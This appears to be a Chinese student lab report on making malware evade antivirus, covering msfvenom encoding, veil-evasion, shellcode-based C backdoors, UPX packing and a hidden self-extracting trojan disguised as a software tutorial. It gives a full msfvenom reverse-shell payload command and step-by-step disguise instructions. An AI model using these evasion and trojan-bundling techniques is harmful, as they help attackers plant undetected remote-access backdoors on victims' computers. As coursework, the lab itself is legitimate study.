任務一:正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,本身利用shellcode編程等免殺工具或技巧;(1.5分)html
任務二:經過組合應用各類技術實現惡意代碼免殺(1分)linux
任務三:用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本(1分)git
返回目錄算法
一、在《Exp2:後門原理與實踐》博客中,咱們生成了一個後門文件。將其放在virscan.org中進行掃描,結果以下圖所示:shell
能夠看出,39款殺軟中有20款報出了病毒。緣由也可想而知,Msfvenom是Metasploit平臺下用來編碼payloads免殺的工具。以Metaspliot的知名度和普及度,只要一有新編碼算法,立刻就會加到特徵庫裏了。編程
二、使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=xxx LPORT=xxx -f exe > met-encoded10.exe
指令進行屢次編碼:windows
再使用virscan.org進行掃描,結果以下所示:安全
仍然有19款殺軟發現病毒。並無什麼卵用。屢次編碼以後的後門,仍是會被大多數殺軟發現並清理的。網絡
返回目錄tcp
安裝veil-evasion的時候遇到了好多麻煩事,網速賊慢,好不容易下載好了,「展開對象」執行了倆小時還沒結束,去網上也搜不到相關的緣由和解釋,最終仍是拷貝了老師的虛擬機。
一、啓動evail-evasion,設置好回連的IP地址和端口號後,生成後門文件:
二、放到virscan.org上掃描一下:
比以前用msf生成的文件報毒率低,但仍是會被殺軟檢測出來。
在《Exp2:後門原理與實踐》博客中,一樣介紹了生成shellcode的方法,此次咱們利用生成的shellcode編寫後門程序,半手工打造惡意軟件。
一、生成的shellcode以下圖所示:
二、利用shellcode編寫一個C語言程序後門,在windows下編譯運行後,測試其可用性:
能夠看到,成功獲取了windows權限。
三、不幸的是,仍是被殺毒軟件發現了:
四、掃描發現,仍有20%的殺軟可以掃描出來:
五、再進行加殼嘗試吧。使用UPX對生成的後門程序加殼:
六、殺軟沒有發現它,掃描結果也比較樂觀:
七、測試仍然可用:
隨着人們對木馬的瞭解和防範意識的加強,木馬設計者們開發出了更多的功能來假裝木馬,以達到下降用戶警覺的目的。經常使用的假裝手段有:
在這裏,咱們來嘗試製做自解壓捆綁木馬。
一、將要捆綁的文件們放在同一個文件夾下,右擊選擇「添加到壓縮文件」
二、設置壓縮參數。起一個有趣的名字,並勾選上「建立自解壓格式壓縮文件」複選框。
三、切換至「高級」選項卡,點擊「自解壓選項」,選中「模式」中的「所有隱藏」並肯定。
四、再打開「文本和圖標」選項卡,填寫「自解壓文件窗口標題」和「自解壓文件窗口中顯示的文本」,並找一個有趣的圖標做爲這個自解壓文件的圖標,好比下面這個比較符合「Linux軟件教程」氣質的圖標:
點擊肯定按鈕。
五、這樣一來,咱們就生成了一個看起來很是正經的自解壓的壓縮文件。
六、放到virscan.org試一下,雖然說仍是會被部分殺軟發現,但機率下降了不少~
在virscan.org上面檢測的過程當中,發現雖然上傳的是一個文件,但不一樣的殺毒軟件,掃描結果不盡相同。這是爲何呢?掃描出來的結果都是些什麼呢?
查閱資料瞭解到,這是由於不一樣的殺毒軟件病毒庫不徹底相同,殺毒引擎不同,另外,不一樣的軟件功臣是對病毒、系統漏洞的理解也不盡相同。這就形成了殺軟結果的千差萬別。